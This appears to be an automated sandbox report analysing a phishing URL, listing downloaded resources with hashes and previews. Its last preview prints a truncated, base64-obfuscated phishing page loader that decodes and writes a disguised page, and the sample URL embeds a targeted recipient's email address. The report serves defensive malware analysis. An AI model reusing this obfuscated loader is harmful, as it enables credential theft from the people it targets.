                                      Analysis ID:1641500
                                      Start date and time:2025-03-18 10:14:48 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Sample URL:https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.com
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:14
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      Analysis Mode:stream
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal92.phis.evad.win@22/6@18/192
                                      • Exclude process from analysis (whitelisted): svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 172.217.16.206, 142.250.185.67, 66.102.1.84, 142.250.186.46, 142.250.185.78, 142.250.186.110, 142.250.185.142, 142.250.185.238
                                      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.com
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                      Category:downloaded
                                      Size (bytes):937
                                      Entropy (8bit):7.737931820487441
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:FC3B7BBE7970F47579127561139060E2
                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://developers.cloudflare.com/favicon.png
                                      Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                      Category:downloaded
                                      Size (bytes):48316
                                      Entropy (8bit):5.6346993394709
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:2CA03AD87885AB983541092B87ADB299
                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (48238)
                                      Category:downloaded
                                      Size (bytes):48239
                                      Entropy (8bit):5.343270713163753
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:184E29DE57C67BC329C650F294847C16
                                      SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                      SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                      SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                      Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:very short file (no magic)
                                      Category:downloaded
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://3gd07.gqzxtn.ru/kabutar$czeosv8k
                                      Preview:1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65447)
                                      Category:downloaded
                                      Size (bytes):89501
                                      Entropy (8bit):5.289893677458563
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (65368)
                                      Category:downloaded
                                      Size (bytes):182211
                                      Entropy (8bit):4.562806453205994
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:8FC49E1930F95BD3E83099F0CFBF9AC6
                                      SHA1:B514B7AAADF516003CD231AC6A491DCB2D1785E0
                                      SHA-256:9B2B1AA0688A36AFF5D3D108C464FFA39869715260F8EB6F5A546BB21C4AD255
                                      SHA-512:FA2307E6098FA701D3FE254C612EF3F1D2A43C1C1FDB5360E17205D77C9B960B9FBD87ADC56A6222B860F2BD2C14ADD4B9830B639344B2B3455A66B526174097
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://nr2.vesuperw.ru/IDnh/
                                      Preview:<script>.sZqradFZmM = atob("aHR0cHM6Ly9OUjIudmVzdXBlcncucnUvSURuaC8=");.wuNMyiMzoe = atob("bm9tYXRjaA==");.GmGqJzaqEE = atob("d3JpdGU=");.if(sZqradFZmM == wuNMyiMzoe){.document[GmGqJzaqEE](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IHZSSmxkU3dRcHEgPSB7CiAgZ2V0KG5EQkhwS0Z2THksIGdjSGhBb1RjT0UpIHsKICAgIGNvbnN0IGhiU1NodEtNRnAgPSBbLi4uZ2NIaEFvVGNPRV0KICAgICAgLm1hcChMWnRaZXp3YWZLID0+ICsoJ+++oCcgPiBMWnRaZXp3YWZLKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3Qga0ZlVklvckZWZCA9IGhiU1NodEtNRnAucmVwbGFjZSgvLns4fS9nLCBPUUlKanV3dHBBID0
                                      No static file info